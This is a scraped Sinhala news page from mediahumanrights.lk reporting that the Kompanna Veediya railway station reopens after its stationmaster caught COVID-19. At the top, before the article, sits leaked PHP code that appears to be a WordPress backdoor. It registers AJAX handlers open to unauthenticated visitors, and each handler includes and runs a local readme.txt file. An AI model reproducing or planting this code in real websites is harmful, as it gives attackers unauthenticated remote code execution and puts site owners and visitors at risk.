if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } කොම්පඤ්ඤවීදිය දුම්රිය ස්ථානය හෙට (07) සිට සේවා අරඔයි. - mediahumanrights.lk
mediahumanrights.lk
Local News News

කොම්පඤ්ඤවීදිය දුම්රිය ස්ථානය හෙට (07) සිට සේවා අරඔයි.

මෙතෙක් වසා දමා තිබු කොම්පඤ්ඤවීදිය දුම්රිය ස්ථානය හෙට (07) සිට මගීන් සදහා විවෘත කරන බව දුම්රිය ස්ථානාධිපති සංගමයේ ලේකම් කසුන් චාමර මහතා පවසයි.

කොම්පඤ්ඤවීදිය දුම්රිය ස්ථානාධිපතිවරයාට කොවිඩ් 19 වැලදීම නිසා දින කිහිපයක් වසා දැමීමට සිදුවිය. ඒ අනුව කොම්පඤ්ඤවීදය දුම්රිය ස්ථානයට දුම්රිය ස්ථානාධිපති වරුන් දෙදෙනකු ගෙන් හා කණිෂ්ඨ කාර්ය මණ්ඩලයේ දෙදෙනකු සමත්විතව සිය රාජකාරි කටයුතු සිදුකෙරේ.

දුම්රිය ස්ථානයෙන් මගීන් හට දුම්රිය ප්‍රවේශපත්‍ර හා වාර ප්‍රවේශපත්‍ර නිකුත් කිරීම ද කිසිදු අඩුපාඩුවකින් තොරව සිදු කෙරෙන ඇත. කාර්යාල සදහා ගමන් කිරීමට පැමිණෙන මගීන් කිසිදු චකිතයක් ඇතිකර ගත යුතු නැති අතර දුම්රිය ස්ථානයට පැමිණෙන මගීන් මුඛ ආවරණ පැලද සෞඛ්‍ය ආරක්ෂිත ක්‍රමවේදයන් අනුගමනය කරමින් පැමිණෙන ලෙසද කසුන් චාමර මහතා වැඩි දුරටත් පැවසුවේය.

Related posts

අගමැතිනි හරිනිට ඉල්ලා අස්වන්නැයි කියයි…

Shiran Viraj

අධිවේගී ජල ක්‍රීඩා බෝට්ටු හිරකර ඉන්ධන පිරවුම්හලේ විරෝධතා….

Shiran Viraj

ගුවන් හමුදා නිල ඇදුමක් සමග සැකකරුවෙක් ගුවන් තොටුපොලේදී අත්අඩංගුවට

Shiran Viraj